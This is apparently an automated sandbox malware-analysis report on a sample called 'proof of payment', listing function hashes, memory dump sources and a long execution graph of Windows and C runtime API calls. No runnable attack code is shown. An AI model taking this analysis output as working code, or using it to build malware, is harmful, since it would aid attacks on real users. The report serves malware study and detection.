                                      • Opcode ID: 9425844ac4bcf1433972871f882bf492c9386ab3523422e3e73129faef664857
                                      • Instruction ID: 1933d80212d31baa83fdd9660a77541d3472d2e7ee2742a5a5dcc45722d2e575
                                      • Opcode Fuzzy Hash: 9425844ac4bcf1433972871f882bf492c9386ab3523422e3e73129faef664857
                                      • Instruction Fuzzy Hash: F3210471504384EFDB05DF50D9C0B66BBA5FB88318F20C56DE8498B392D336E856CB61
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 008BD006 Relevance: .1, Instructions: 63COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1497668045.00000000008BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008BD000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_8bd000_proof of payment.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5f41a0fca627053da53c75c85b103fc3433e304776dd91e4e36054f1a2230e87
                                      • Instruction ID: 1039eb94571cf32d9dec3473e03725bc26a0f14679308b3e5179669e44af39b3
                                      • Opcode Fuzzy Hash: 5f41a0fca627053da53c75c85b103fc3433e304776dd91e4e36054f1a2230e87
                                      • Instruction Fuzzy Hash: 6F2180755087809FCB02DF14D994B11BFB1FB46314F28C5EAD8498F2A7D33A985ACB62
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 008AD3D3 Relevance: .1, Instructions: 56COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1497613728.00000000008AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008AD000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_8ad000_proof of payment.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8a9223d17f0c59b9928f2445ae754a3689dedab5288f4c6dbc5edc2f4224d076
                                      • Instruction ID: 1cebd036886ea95c5cad214c8f85750a988d52ddc4d0dd88b13b188faa013d42
                                      • Opcode Fuzzy Hash: 8a9223d17f0c59b9928f2445ae754a3689dedab5288f4c6dbc5edc2f4224d076
                                      • Instruction Fuzzy Hash: 14110376404340CFDB01CF00D5C4B16BF71FB98324F24C2A9D80A8BA56C33AE85ACBA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 008AD4BF Relevance: .1, Instructions: 56COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1497613728.00000000008AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008AD000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_8ad000_proof of payment.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8a9223d17f0c59b9928f2445ae754a3689dedab5288f4c6dbc5edc2f4224d076
                                      • Instruction ID: e9cd449e215febec680b3a4f8747c77be64a5610ef6819ff15a2645a65028188
                                      • Opcode Fuzzy Hash: 8a9223d17f0c59b9928f2445ae754a3689dedab5288f4c6dbc5edc2f4224d076
                                      • Instruction Fuzzy Hash: 2311D376904380CFDB15CF10D5C4B1ABF71FB94318F24C6A9D84A8BA56C336D85ACBA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 008BD1CF Relevance: .1, Instructions: 53COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1497668045.00000000008BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008BD000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_8bd000_proof of payment.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 04b342587f02f4df216fd9fa4589941a60fabf0b5787ec5e4e812599987ae7f8
                                      • Instruction ID: 26628870da69c7012b33806af39cf947e2fe4a5c741f22b87cce531fdbf140c9
                                      • Opcode Fuzzy Hash: 04b342587f02f4df216fd9fa4589941a60fabf0b5787ec5e4e812599987ae7f8
                                      • Instruction Fuzzy Hash: AC118B75504280EFCB15CF10D5C4B55BFA2FB84314F24C6A9D8498B796D33AE84ACB61
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Non-executed Functions

                                      Function 00D5DCD4 Relevance: .3, Instructions: 264COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1499167345.0000000000D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d50000_proof of payment.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 99bf154f43f7e2146dd7a3f3e0081d3ed65950a33ab6f3c4338175b5437dafee
                                      • Instruction ID: e538cdd4f9ffdfc44479975a1591c3a13c7567eb4796d50d235d67af1f9e9093
                                      • Opcode Fuzzy Hash: 99bf154f43f7e2146dd7a3f3e0081d3ed65950a33ab6f3c4338175b5437dafee
                                      • Instruction Fuzzy Hash: 48A15A32A002098FCF15DFB4D8405AEB7B2FF85301B19457AEC05AF265DB71E94ACBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Execution Graph

                                      Execution Coverage:2.6%
                                      Dynamic/Decrypted Code Coverage:100%
                                      Signature Coverage:2.6%
                                      Total number of Nodes:1673
                                      Total number of Limit Nodes:5
                                      execution_graph 6389 10008640 6392 10008657 6389->6392 6393 10008665 6392->6393 6394 10008679 6392->6394 6395 10006368 _free 20 API calls 6393->6395 6396 10008681 6394->6396 6397 10008693 6394->6397 6398 1000866a 6395->6398 6399 10006368 _free 20 API calls 6396->6399 6404 10008652 6397->6404 6405 100054a7 6397->6405 6401 100062ac _abort 26 API calls 6398->6401 6402 10008686 6399->6402 6401->6404 6403 100062ac _abort 26 API calls 6402->6403 6403->6404 6406 100054c4 6405->6406 6412 100054ba 6405->6412 6407 10005af6 _abort 38 API calls 6406->6407 6406->6412 6408 100054e5 6407->6408 6413 10007a00 6408->6413 6412->6404 6414 10007a13 6413->6414 6416 100054fe 6413->6416 6414->6416 6421 10007f0f 6414->6421 6417 10007a2d 6416->6417 6418 10007a40 6417->6418 6420 10007a55 6417->6420 6418->6420 6556 10006d7e 6418->6556 6420->6412 6422 10007f1b ___scrt_is_nonwritable_in_current_image 6421->6422 6423 10005af6 _abort 38 API calls 6422->6423 6424 10007f24 6423->6424 6425 10007f72 _abort 6424->6425 6433 10005671 RtlEnterCriticalSection 6424->6433 6425->6416 6427 10007f42 6434 10007f86 6427->6434 6432 100055a8 _abort 38 API calls 6432->6425 6433->6427 6435 10007f56 6434->6435 6436 10007f94 __fassign 6434->6436 6438 10007f75 6435->6438 6436->6435 6441 10007cc2 6436->6441 6555 100056b9 RtlLeaveCriticalSection 6438->6555 6440 10007f69 6440->6425 6440->6432 6442 10007d42 6441->6442 6446 10007cd8 6441->6446 6443 10007d90 6442->6443 6445 1000571e _free 20 API calls 6442->6445 6509 10007e35 6443->6509 6447 10007d64 6445->6447 6446->6442 6448 10007d0b 6446->6448 6453 1000571e _free 20 API calls 6446->6453 6449 1000571e _free 20 API calls 6447->6449 6450 10007d2d 6448->6450 6455 1000571e _free 20 API calls 6448->6455 6451 10007d77 6449->6451 6452 1000571e _free 20 API calls 6450->6452 6454 1000571e _free 20 API calls 6451->6454 6456 10007d37 6452->6456 6458 10007d00 6453->6458 6461 10007d85 6454->6461 6462 10007d22 6455->6462 6463 1000571e _free 20 API calls 6456->6463 6457 10007dfe 6464 1000571e _free 20 API calls 6457->6464 6469 100090ba 6458->6469 6459 10007d9e 6459->6457 6467 1000571e 20 API calls _free 6459->6467 6465 1000571e _free 20 API calls 6461->6465 6497 100091b8 6462->6497 6463->6442 6468 10007e04 6464->6468 6465->6443 6467->6459 6468->6435 6470 100090cb 6469->6470 6496 100091b4 6469->6496 6471 100090dc 6470->6471 6473 1000571e _free 20 API calls 6470->6473 6472 100090ee 6471->6472 6474 1000571e _free 20 API calls 6471->6474 6475 10009100 6472->6475 6476 1000571e _free 20 API calls 6472->6476 6473->6471 6474->6472 6477 10009112 6475->6477 6478 1000571e _free 20 API calls 6475->6478 6476->6475 6479 10009124 6477->6479 6481 1000571e _free 20 API calls 6477->6481 6478->6477 6480 10009136 6479->6480 6482 1000571e _free 20 API calls 6479->6482 6483 10009148 6480->6483 6484 1000571e _free 20 API calls 6480->6484 6481->6479 6482->6480 6485 1000571e _free 20 API calls 6483->6485 6488 1000915a 6483->6488 6484->6483 6485->6488 6486 1000916c 6487 1000917e 6486->6487 6490 1000571e _free 20 API calls 6486->6490 6491 10009190 6487->6491 6492 1000571e _free 20 API calls 6487->6492 6488->6486 6489 1000571e _free 20 API calls 6488->6489 6489->6486 6490->6487 6493 100091a2 6491->6493 6494 1000571e _free 20 API calls 6491->6494 6492->6491 6495 1000571e _free 20 API calls 6493->6495 6493->6496 6494->6493 6495->6496 6496->6448 6498 100091c5 6497->6498 6499 1000921d 6497->6499 6500 100091d5 6498->6500 6502 1000571e _free 20 API calls 6498->6502 6499->6450 6501 100091e7 6500->6501 6503 1000571e _free 20 API calls 6500->6503 6504 100091f9 6501->6504 6505 1000571e _free 20 API calls 6501->6505 6502->6500 6503->6501 6506 1000920b 6504->6506 6507 1000571e _free 20 API calls 6504->6507 6505->6504 6506->6499 6508 1000571e _free 20 API calls 6506->6508 6507->6506 6508->6499 6510 10007e42 6509->6510 6514 10007e60 6509->6514 6510->6514 6515 1000925d 6510->6515 6513 1000571e _free 20 API calls 6513->6514 6514->6459 6516 10007e5a 6515->6516 6517 1000926e 6515->6517 6516->6513 6551 10009221 6517->6551 6520 10009221 __fassign 20 API calls 6521 10009281 6520->6521 6522 10009221 __fassign 20 API calls 6521->6522 6523 1000928c 6522->6523 6524 10009221 __fassign 20 API calls 6523->6524 6525 10009297 6524->6525 6526 10009221 __fassign 20 API calls 6525->6526 6527 100092a5 6526->6527 6528 1000571e _free 20 API calls 6527->6528 6529 100092b0 6528->6529 6530 1000571e _free 20 API calls 6529->6530 6531 100092bb 6530->6531 6532 1000571e _free 20 API calls 6531->6532 6533 100092c6 6532->6533 6534 10009221 __fassign 20 API calls 6533->6534 6535 100092d4 6534->6535 6536 10009221 __fassign 20 API calls 6535->6536 6537 100092e2 6536->6537 6538 10009221 __fassign 20 API calls 6537->6538 6539 100092f3 6538->6539 6540 10009221 __fassign 20 API calls 6539->6540 6541 10009301 6540->6541 6542 10009221 __fassign 20 API calls 6541->6542 6543 1000930f 6542->6543 6544 1000571e _free 20 API calls 6543->6544 6545 1000931a 6544->6545 6546 1000571e _free 20 API calls 6545->6546 6547 10009325 6546->6547 6548 1000571e _free 20 API calls 6547->6548 6549 10009330 6548->6549 6550 1000571e _free 20 API calls 6549->6550 6550->6516 6552 10009258 6551->6552 6553 10009248 6551->6553 6552->6520 6553->6552 6554 1000571e _free 20 API calls 6553->6554 6554->6553 6555->6440 6557 10006d8a ___scrt_is_nonwritable_in_current_image 6556->6557 6558 10005af6 _abort 38 API calls 6557->6558 6560 10006d94 6558->6560 6562 10006e18 _abort 6560->6562 6563 100055a8 _abort 38 API calls 6560->6563 6564 1000571e _free 20 API calls 6560->6564 6565 10005671 RtlEnterCriticalSection 6560->6565 6566 10006e0f 6560->6566 6562->6420 6563->6560 6564->6560 6565->6560 6569 100056b9 RtlLeaveCriticalSection 6566->6569 6568 10006e16 6568->6560 6569->6568 6777 10007a80 6778 10007a8d 6777->6778 6779 1000637b _free 20 API calls 6778->6779 6780 10007aa7 6779->6780 6781 1000571e _free 20 API calls 6780->6781 6782 10007ab3 6781->6782 6783 10007ad9 6782->6783 6784 1000637b _free 20 API calls 6782->6784 6786 10005eb7 11 API calls 6783->6786 6788 10007ae5 6783->6788 6789 10007b43 6783->6789 6785 10007acd 6784->6785 6787 1000571e _free 20 API calls 6785->6787 6786->6783 6787->6783 7174 10007103 GetCommandLineA GetCommandLineW 7175 10005303 7178 100050a5 7175->7178 7187 1000502f 7178->7187 7181 1000502f 5 API calls 7182 100050c3 7181->7182 7183 10005000 20 API calls 7182->7183 7184 100050ce 7183->7184 7185 10005000 20 API calls 7184->7185 7186 100050d9 7185->7186 7188 10005048 7187->7188 7189 10002ada _ValidateLocalCookies 5 API calls 7188->7189 7190 10005069 7189->7190 7190->7181 7280 1000af43 7281 1000af59 7280->7281 7282 1000af4d 7280->7282 7282->7281 7283 1000af52 CloseHandle 7282->7283 7283->7281 7284 1000a945 7288 1000a96d 7284->7288 7285 1000a9a5 7286 1000a997 7293 1000aa17 7286->7293 7287 1000a99e 7297 1000aa00 7287->7297 7288->7285 7288->7286 7288->7287 7294 1000aa20 7293->7294 7301 1000b19b 7294->7301 7298 1000aa20 7297->7298 7299 1000b19b __startOneArgErrorHandling 21 API calls 7298->7299 7300 1000a9a3 7299->7300 7302 1000b1da __startOneArgErrorHandling 7301->7302 7307 1000b25c __startOneArgErrorHandling 7302->7307 7311 1000b59e 7302->7311 7304 1000b286 7305 1000b8b2 __startOneArgErrorHandling 20 API calls 7304->7305 7306 1000b292 7304->7306 7305->7306 7308 10002ada _ValidateLocalCookies 5 API calls 7306->7308 7307->7304 7309 100078a3 __startOneArgErrorHandling 5 API calls 7307->7309 7310 1000a99c 7308->7310 7309->7304 7312 1000b5c1 __raise_exc RaiseException 7311->7312 7313 1000b5bc 7312->7313 7313->7307 7750 1000a1c6 IsProcessorFeaturePresent 7751 10007bc7 7752 10007bd3 ___scrt_is_nonwritable_in_current_image 7751->7752 7753 10007c0a _abort 7752->7753 7759 10005671 RtlEnterCriticalSection 7752->7759 7755 10007be7 7756 10007f86 __fassign 20 API calls 7755->7756 7757 10007bf7 7756->7757 7760 10007c10 7757->7760 7759->7755 7763 100056b9 RtlLeaveCriticalSection 7760->7763 7762 10007c17 7762->7753 7763->7762 7314 10005348 7315 10003529 ___vcrt_uninitialize 8 API calls 7314->7315 7316 1000534f 7315->7316 7317 10007b48 7327 10008ebf 7317->7327 7321 10007b55 7340 1000907c 7321->7340 7324 10007b7f 7325 1000571e _free 20 API calls 7324->7325 7326 10007b8a 7325->7326 7344 10008ec8 7327->7344 7329 10007b50 7330 10008fdc 7329->7330 7331 10008fe8 ___scrt_is_nonwritable_in_current_image 7330->7331 7364 10005671 RtlEnterCriticalSection 7331->7364 7333 1000905e 7378 10009073 7333->7378 7335 1000906a _abort 7335->7321 7336 10009032 RtlDeleteCriticalSection 7338 1000571e _free 20 API calls 7336->7338 7339 10008ff3 7338->7339 7339->7333 7339->7336 7365 1000a09c 7339->7365 7341 10009092 7340->7341 7342 10007b64 RtlDeleteCriticalSection 7340->7342 7341->7342 7343 1000571e _free 20 API calls 7341->7343 7342->7321 7342->7324 7343->7342 7345 10008ed4 ___scrt_is_nonwritable_in_current_image 7344->7345 7354 10005671 RtlEnterCriticalSection 7345->7354 7347 10008f77 7359 10008f97 7347->7359 7350 10008f83 _abort 7350->7329 7352 10008e78 66 API calls 7353 10008ee3 7352->7353 7353->7347 7353->7352 7355 10007b94 RtlEnterCriticalSection 7353->7355 7356 10008f6d 7353->7356 7354->7353 7355->7353 7362 10007ba8 RtlLeaveCriticalSection 7356->7362 7358 10008f75 7358->7353 7363 100056b9 RtlLeaveCriticalSection 7359->7363 7361 10008f9e 7361->7350 7362->7358 7363->7361 7364->7339 7366 1000a0a8 ___scrt_is_nonwritable_in_current_image 7365->7366 7367 1000a0b9 7366->7367 7368 1000a0ce 7366->7368 7369 10006368 _free 20 API calls 7367->7369 7377 1000a0c9 _abort 7368->7377 7381 10007b94 RtlEnterCriticalSection 7368->7381 7370 1000a0be 7369->7370 7372 100062ac _abort 26 API calls 7370->7372 7372->7377 7373 1000a0ea 7382 1000a026 7373->7382 7375 1000a0f5 7398 1000a112 7375->7398 7377->7339 7646 100056b9 RtlLeaveCriticalSection 7378->7646 7380 1000907a 7380->7335 7381->7373 7383 1000a033 7382->7383 7385 1000a048 7382->7385 7384 10006368 _free 20 API calls 7383->7384 7386 1000a038 7384->7386 7390 1000a043 7385->7390 7401 10008e12 7385->7401 7388 100062ac _abort 26 API calls 7386->7388 7388->7390 7390->7375 7391 1000907c 20 API calls 7392 1000a064 7391->7392 7407 10007a5a 7392->7407 7394 1000a06a 7414 1000adce 7394->7414 7397 1000571e _free 20 API calls 7397->7390 7645 10007ba8 RtlLeaveCriticalSection 7398->7645 7400 1000a11a 7400->7377 7402 10008e26 7401->7402 7403 10008e2a 7401->7403 7402->7391 7403->7402 7404 10007a5a 26 API calls 7403->7404 7405 10008e4a 7404->7405 7429 10009a22 7405->7429 7408 10007a66 7407->7408 7409 10007a7b 7407->7409 7410 10006368 _free 20 API calls 7408->7410 7409->7394 7411 10007a6b 7410->7411 7412 100062ac _abort 26 API calls 7411->7412 7413 10007a76 7412->7413 7413->7394 7415 1000addd 7414->7415 7417 1000adf2 7414->7417 7416 10006355 __dosmaperr 20 API calls 7415->7416 7420 1000ade2 7416->7420 7418 1000ae2d 7417->7418 7423 1000ae19 7417->7423 7419 10006355 __dosmaperr 20 API calls 7418->7419 7421 1000ae32 7419->7421 7422 10006368 _free 20 API calls 7420->7422 7424 10006368 _free 20 API calls 7421->7424 7426 1000a070 7422->7426 7602 1000ada6 7423->7602 7427 1000ae3a 7424->7427 7426->7390 7426->7397 7428 100062ac _abort 26 API calls 7427->7428 7428->7426 7430 10009a2e ___scrt_is_nonwritable_in_current_image 7429->7430 7431 10009a36 7430->7431 7432 10009a4e 7430->7432 7454 10006355 7431->7454 7433 10009aec 7432->7433 7438 10009a83 7432->7438 7435 10006355 __dosmaperr 20 API calls 7433->7435 7439 10009af1 7435->7439 7437 10006368 _free 20 API calls 7450 10009a43 _abort 7437->7450 7457 10008c7b RtlEnterCriticalSection 7438->7457 7441 10006368 _free 20 API calls 7439->7441 7443 10009af9 7441->7443 7442 10009a89 7444 10009aa5 7442->7444 7445 10009aba 7442->7445 7446 100062ac _abort 26 API calls 7443->7446 7447 10006368 _free 20 API calls 7444->7447 7458 10009b0d 7445->7458 7446->7450 7449 10009aaa 7447->7449 7452 10006355 __dosmaperr 20 API calls 7449->7452 7450->7402 7451 10009ab5 7509 10009ae4 7451->7509 7452->7451 7455 10005b7a _free 20 API calls 7454->7455 7456 1000635a 7455->7456 7456->7437 7457->7442 7459 10009b3b 7458->7459 7497 10009b34 7458->7497 7460 10009b5e 7459->7460 7461 10009b3f 7459->7461 7465 10009b92 7460->7465 7469 10009baf 7460->7469 7463 10006355 __dosmaperr 20 API calls 7461->7463 7462 10002ada _ValidateLocalCookies 5 API calls 7466 10009d15 7462->7466 7464 10009b44 7463->7464 7467 10006368 _free 20 API calls 7464->7467 7470 10006355 __dosmaperr 20 API calls 7465->7470 7466->7451 7471 10009b4b 7467->7471 7468 10009bc5 7515 100096b2 7468->7515 7469->7468 7512 1000a00b 7469->7512 7474 10009b97 7470->7474 7475 100062ac _abort 26 API calls 7471->7475 7477 10006368 _free 20 API calls 7474->7477 7475->7497 7480 10009b9f 7477->7480 7478 10009bd3 7483 10009bd7 7478->7483 7484 10009bf9 7478->7484 7479 10009c0c 7481 10009c20 7479->7481 7482 10009c66 WriteFile 7479->7482 7485 100062ac _abort 26 API calls 7480->7485 7486 10009c56 7481->7486 7487 10009c28 7481->7487 7489 10009c89 GetLastError 7482->7489 7495 10009bef 7482->7495 7488 10009ccd 7483->7488 7522 10009645 7483->7522 7527 10009492 GetConsoleCP 7484->7527 7485->7497 7553 10009728 7486->7553 7491 10009c46 7487->7491 7492 10009c2d 7487->7492 7496 10006368 _free 20 API calls 7488->7496 7488->7497 7489->7495 7545 100098f5 7491->7545 7492->7488 7538 10009807 7492->7538 7495->7488 7495->7497 7500 10009ca9 7495->7500 7499 10009cf2 7496->7499 7497->7462 7502 10006355 __dosmaperr 20 API calls 7499->7502 7503 10009cb0 7500->7503 7504 10009cc4 7500->7504 7502->7497 7505 10006368 _free 20 API calls 7503->7505 7560 10006332 7504->7560 7507 10009cb5 7505->7507 7508 10006355 __dosmaperr 20 API calls 7507->7508 7508->7497 7601 10008c9e RtlLeaveCriticalSection 7509->7601 7511 10009aea 7511->7450 7565 10009f8d 7512->7565 7587 10008dbc 7515->7587 7517 100096c2 7518 100096c7 7517->7518 7519 10005af6 _abort 38 API calls 7517->7519 7518->7478 7518->7479 7520 100096ea 7519->7520 7520->7518 7521 10009708 GetConsoleMode 7520->7521 7521->7518 7523 1000966a 7522->7523 7526 1000969f 7522->7526 7524 100096a1 GetLastError 7523->7524 7525 1000a181 WriteConsoleW CreateFileW 7523->7525 7523->7526 7524->7526 7525->7523 7526->7495 7535 100094f5 7527->7535 7537 10009607 7527->7537 7528 10002ada _ValidateLocalCookies 5 API calls 7529 10009641 7528->7529 7529->7495 7531 100079e6 40 API calls __fassign 7531->7535 7532 1000957b WideCharToMultiByte 7533 100095a1 WriteFile 7532->7533 7532->7537 7534 1000962a GetLastError 7533->7534 7533->7535 7534->7537 7535->7531 7535->7532 7536 100095d2 WriteFile 7535->7536 7535->7537 7596 10007c19 7535->7596 7536->7534 7536->7535 7537->7528 7540 10009816 7538->7540 7539 100098d8 7542 10002ada _ValidateLocalCookies 5 API calls 7539->7542 7540->7539 7541 10009894 WriteFile 7540->7541 7541->7540 7543 100098da GetLastError 7541->7543 7544 100098f1 7542->7544 7543->7539 7544->7495 7548 10009904 7545->7548 7546 10009a0f 7547 10002ada _ValidateLocalCookies 5 API calls 7546->7547 7549 10009a1e 7547->7549 7548->7546 7550 10009986 WideCharToMultiByte 7548->7550 7552 100099bb WriteFile 7548->7552 7549->7495 7551 10009a07 GetLastError 7550->7551 7550->7552 7551->7546 7552->7548 7552->7551 7557 10009737 7553->7557 7554 100097ea 7556 10002ada _ValidateLocalCookies 5 API calls 7554->7556 7555 100097a9 WriteFile 7555->7557 7558 100097ec GetLastError 7555->7558 7559 10009803 7556->7559 7557->7554 7557->7555 7558->7554 7559->7495 7561 10006355 __dosmaperr 20 API calls 7560->7561 7562 1000633d _free 7561->7562 7563 10006368 _free 20 API calls 7562->7563 7564 10006350 7563->7564 7564->7497 7574 10008d52 7565->7574 7567 10009f9f 7568 10009fa7 7567->7568 7569 10009fb8 SetFilePointerEx 7567->7569 7572 10006368 _free 20 API calls 7568->7572 7570 10009fd0 GetLastError 7569->7570 7571 10009fac 7569->7571 7573 10006332 __dosmaperr 20 API calls 7570->7573 7571->7468 7572->7571 7573->7571 7575 10008d5f 7574->7575 7577 10008d74 7574->7577 7576 10006355 __dosmaperr 20 API calls 7575->7576 7579 10008d64 7576->7579 7578 10006355 __dosmaperr 20 API calls 7577->7578 7580 10008d99 7577->7580 7581 10008da4 7578->7581 7582 10006368 _free 20 API calls 7579->7582 7580->7567 7583 10006368 _free 20 API calls 7581->7583 7584 10008d6c 7582->7584 7585 10008dac 7583->7585 7584->7567 7586 100062ac _abort 26 API calls 7585->7586 7586->7584 7588 10008dc9 7587->7588 7590 10008dd6 7587->7590 7589 10006368 _free 20 API calls 7588->7589 7591 10008dce 7589->7591 7592 10008de2 7590->7592 7593 10006368 _free 20 API calls 7590->7593 7591->7517 7592->7517 7594 10008e03 7593->7594 7595 100062ac _abort 26 API calls 7594->7595 7595->7591 7597 10005af6 _abort 38 API calls 7596->7597 7598 10007c24 7597->7598 7599 10007a00 __fassign 38 API calls 7598->7599 7600 10007c34 7599->7600 7600->7535 7601->7511 7605 1000ad24 7602->7605 7604 1000adca 7604->7426 7606 1000ad30 ___scrt_is_nonwritable_in_current_image 7605->7606 7616 10008c7b RtlEnterCriticalSection 7606->7616 7608 1000ad3e 7609 1000ad70 7608->7609 7610 1000ad65 7608->7610 7612 10006368 _free 20 API calls 7609->7612 7617 1000ae4d 7610->7617 7613 1000ad6b 7612->7613 7632 1000ad9a 7613->7632 7615 1000ad8d _abort 7615->7604 7616->7608 7618 10008d52 26 API calls 7617->7618 7621 1000ae5d 7618->7621 7619 1000ae63 7635 10008cc1 7619->7635 7621->7619 7622 1000ae95 7621->7622 7624 10008d52 26 API calls 7621->7624 7622->7619 7625 10008d52 26 API calls 7622->7625 7627 1000ae8c 7624->7627 7628 1000aea1 CloseHandle 7625->7628 7626 1000aedd 7626->7613 7630 10008d52 26 API calls 7627->7630 7628->7619 7631 1000aead GetLastError 7628->7631 7629 10006332 __dosmaperr 20 API calls 7629->7626 7630->7622 7631->7619 7644 10008c9e RtlLeaveCriticalSection 7632->7644 7634 1000ada4 7634->7615 7636 10008cd0 7635->7636 7637 10008d37 7635->7637 7636->7637 7641 10008cfa 7636->7641 7638 10006368 _free 20 API calls 7637->7638 7639 10008d3c 7638->7639 7640 10006355 __dosmaperr 20 API calls 7639->7640 7642 10008d27 7640->7642 7641->7642 7643 10008d21 SetStdHandle 7641->7643 7642->7626 7642->7629 7643->7642 7644->7634 7645->7400 7646->7380 6570 10002049 6571 10002055 ___scrt_is_nonwritable_in_current_image 6570->6571 6572 100020d3 6571->6572 6573 1000207d 6571->6573 6583 1000205e 6571->6583 6605 10002639 IsProcessorFeaturePresent 6572->6605 6584 1000244c 6573->6584 6576 100020da 6577 10002082 6593 10002308 6577->6593 6579 10002087 __RTC_Initialize 6596 100020c4 6579->6596 6581 1000209f 6599 1000260b 6581->6599 6585 10002451 ___scrt_release_startup_lock 6584->6585 6586 10002455 6585->6586 6588 10002461 6585->6588 6587 1000527a _abort 20 API calls 6586->6587 6589 1000245f 6587->6589 6590 1000246e 6588->6590 6591 1000499b _abort 28 API calls 6588->6591 6589->6577 6590->6577 6592 10004bbd 6591->6592 6592->6577 6609 100034c7 RtlInterlockedFlushSList 6593->6609 6595 10002312 6595->6579 6611 1000246f 6596->6611 6598 100020c9 ___scrt_release_startup_lock 6598->6581 6600 10002617 6599->6600 6601 1000262d 6600->6601 6652 100053ed 6600->6652 6601->6583 6606 1000264e ___scrt_fastfail 6605->6606 6607 100026f9 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 6606->6607 6608 10002744 ___scrt_fastfail 6607->6608 6608->6576 6610 100034d7 6609->6610 6610->6595 6616 100053ff 6611->6616 6623 10005c2b 6616->6623 6619 1000391b 6620 1000354d 6619->6620 6621 10003925 6619->6621 6620->6598 6634 10003b2c 6621->6634 6624 10002476 6623->6624 6625 10005c35 6623->6625 6624->6619 6627 10005db2 6625->6627 6628 10005c45 _free 5 API calls 6627->6628 6629 10005dd9 6628->6629 6630 10005df1 TlsFree 6629->6630 6631 10005de5 6629->6631 6630->6631 6632 10002ada _ValidateLocalCookies 5 API calls 6631->6632 6633 10005e02 6632->6633 6633->6624 6639 10003a82 6634->6639 6636 10003b46 6637 10003b5e TlsFree 6636->6637 6638 10003b52 6636->6638 6637->6638 6638->6620 6640 10003aaa 6639->6640 6644 10003aa6 __crt_fast_encode_pointer 6639->6644 6640->6644 6645 100039be 6640->6645 6643 10003ac4 GetProcAddress 6643->6644 6644->6636 6650 100039cd try_get_first_available_module 6645->6650 6646 10003a77 6646->6643 6646->6644 6647 100039ea LoadLibraryExW 6648 10003a05 GetLastError 6647->6648 6647->6650 6648->6650 6649 10003a60 FreeLibrary 6649->6650 6650->6646 6650->6647 6650->6649 6651 10003a38 LoadLibraryExW 6650->6651 6651->6650 6663 100074da 6652->6663 6655 10003529 6656 10003532 6655->6656 6662 10003543 6655->6662 6657 1000391b ___vcrt_uninitialize_ptd 6 API calls 6656->6657 6658 10003537 6657->6658 6667 10003972 6658->6667 6662->6601 6664 100074f3 6663->6664 6665 10002ada _ValidateLocalCookies 5 API calls 6664->6665 6666 10002625 6665->6666 6666->6655 6668 1000353c 6667->6668 6669 1000397d 6667->6669 6671 10003c50 6668->6671 6670 10003987 RtlDeleteCriticalSection 6669->6670 6670->6668 6670->6670 6672 10003c7f 6671->6672 6673 10003c59 6671->6673 6672->6662 6673->6672 6674 10003c69 FreeLibrary 6673->6674 6674->6673 6790 10008a89 6793 10006d60 6790->6793 6794 10006d69 6793->6794 6795 10006d72 6793->6795 6797 10006c5f 6794->6797 6798 10005af6 _abort 38 API calls 6797->6798 6799 10006c6c 6798->6799 6800 10006d7e __fassign 38 API calls 6799->6800 6801 10006c74 6800->6801 6817 100069f3 6801->6817 6804 10006c8b 6804->6795 6807 10006cce 6810 1000571e _free 20 API calls 6807->6810 6810->6804 6811 10006cc9 6812 10006368 _free 20 API calls 6811->6812 6812->6807 6813 10006d12 6813->6807 6841 100068c9 6813->6841 6814 10006ce6 6814->6813 6815 1000571e _free 20 API calls 6814->6815 6815->6813 6818 100054a7 __fassign 38 API calls 6817->6818 6819 10006a05 6818->6819 6820 10006a14 GetOEMCP 6819->6820 6821 10006a26 6819->6821 6822 10006a3d 6820->6822 6821->6822 6823 10006a2b GetACP 6821->6823 6822->6804 6824 100056d0 6822->6824 6823->6822 6825 1000570e 6824->6825 6829 100056de _free 6824->6829 6827 10006368 _free 20 API calls 6825->6827 6826 100056f9 RtlAllocateHeap 6828 1000570c 6826->6828 6826->6829 6827->6828 6828->6807 6831 10006e20 6828->6831 6829->6825 6829->6826 6830 1000474f _free 7 API calls 6829->6830 6830->6829 6832 100069f3 40 API calls 6831->6832 6833 10006e3f 6832->6833 6836 10006e90 IsValidCodePage 6833->6836 6838 10006e46 6833->6838 6840 10006eb5 ___scrt_fastfail 6833->6840 6834 10002ada _ValidateLocalCookies 5 API calls 6835 10006cc1 6834->6835 6835->6811 6835->6814 6837 10006ea2 GetCPInfo 6836->6837 6836->6838 6837->6838 6837->6840 6838->6834 6844 10006acb GetCPInfo 6840->6844 6917 10006886 6841->6917 6843 100068ed 6843->6807 6845 10006baf 6844->6845 6850 10006b05 6844->6850 6847 10002ada _ValidateLocalCookies 5 